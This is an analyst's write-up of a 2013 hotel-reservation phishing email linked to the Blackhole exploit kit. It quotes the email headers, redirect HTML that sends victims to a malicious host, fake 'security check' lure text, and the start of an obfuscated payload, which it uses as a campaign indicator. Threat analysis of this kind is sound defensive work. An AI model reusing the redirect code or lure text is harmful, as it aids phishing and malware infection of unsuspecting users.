Hotel Registration Phishing Campaign with AutoClerk(?)

This particular campaign is using the "shock and awe" billing technique to create urgency. This campaign is using predictable Blackhole techniques.
Also spotted on DSL Reports


Subject:   Your reservation at HOTEL UNION SQUARE
From:   "Reservations" <reservations@m.personalityhotelsmail.net>
Date:   Wed, June 19, 2013 12:39 pm
Priority:   Normal

Header information:
X-Mailer: AutoClerk <--- Whoa. Stop.
Let's dive
http://www.autoclerk.com/news/autoclerk-introduces-emarketing-to-its-suite-of-products-and-services
Autoclerk is a property management system that provides eMarketing to Hotels.
http://www.autoclerk.com/hotel-emarketing

^^

Content-Type: multipart/alternative; <-- Plain text and html elements k.
X-Spam-Status: No, score=5.8 <--- Not close enough.

Sent to you from Copenhagen, because clearly that's where Hotel Union Square is... not.

The payload uses a refresh method to immediately redirect you. Nothing new but we can still use this for more information.

(html>(CR)(LF)

(title>HOTEL·UNION·SQUARE·is·loading...(/title>(CR)(LF)

(script·type="text/javascript">(CR)(LF)

(!--(CR)(LF)

location.replace("http://winne2000.net/news/enough-advise.php");(CR)(LF)

//-->(CR)(LF)

(/script>(CR)(LF)

(noscript>(CR)(LF)

(meta·http-equiv="refresh"·content="0;·url=http://winne2000.net/news/enough-advise.php">(CR)(LF)

(/noscript>(CR)(LF)

(CR)(LF)

(/head>(CR)(LF)

(CR)(LF)

(h1>You·will·be·redirected·to·process(/h1>(CR)(LF)

(CR)(LF)

(CR)(LF)

(h4·style="color:#364dbc;">We·must·complete·few·security·checks·to·show·your·transfer·details:(/h4>(CR)(LF)

(CR)(LF)

(h3>Be·sure·you·have·a·transfer·reference·ID.(br·/>You·will·be·asked·to·enter·it·after·we·check·the·link.(br>(br>Important:·Please·be·advised·that·calls·to·and·from·your·wire·service·team·may·be·monitored·or·recorded.(br·/>(/h3>(CR)(LF)

(CR)(LF)

(h3>Redirecting·to·Complain·details...·Please·wait...(/h3>(CR)(LF)

And the payload begins us with 

<style>b,div{color:#fff;}</style><script>function vq(){s="";zzz();az=21;try{caewbtew=~312;}catch(vava){az=0;}

Let's go deeper

The caewbtew=~ string at the entry point is consistent with FedEx, American Airlines, DHL, and paypal with some obfuscation techniques that follow. Oh yes, also the BBB Campaign I looked at here. There are two observed variants, one with catch(vava) and one with catch(qw). This is some lovely stuff when coupled with some other indicators and I've used it very successfully in the past.

This string has also been spotted in other compromised wordpress sites, about 860 indexed in google.

April http://jsunpack.jeek.org/?report=1389949d2b3b67f33871cbe7c001b8fb3caafe11

April https://gist.github.com/evilscheme/d10ea4130d5362618653/raw/d87777b84ab172a6d17ef3211539d336b53401b6/gistfile1.txt

May http://jsunpack.jeek.org/dec/go?report=18cb65b3b38a735293e483cd4ef6588bce6cd7ec

June http://jsunpack.jeek.org/dec/go?report=8bd4f7ec9acaa2e252a5964cf4069e5c37048fb0

Which also contained the string:

Redirecting to Complain details... Please wait...

Something like 860 hits. Same as the BBB Campaign

Proving once again that nothing beats a human security analyst:

I'm not going to rehash blackhole here. We know what's up. Evidence of a broader campaign below.

References:

http://techhelplist.com/index.php/spam-list/150-receipt-for-your-paypal-payment-to-x-fake-paypal-phishing-scam

https://groups.google.com/forum/?fromgroups#!searchin/alt.comp.virus/caewbtew/alt.comp.virus/Xlp886uCKDU/ptGWLsd_7pEJ (Oddly enough about a Windows 98 system hit with exploit)

http://pastebin.com/vBVJUb9w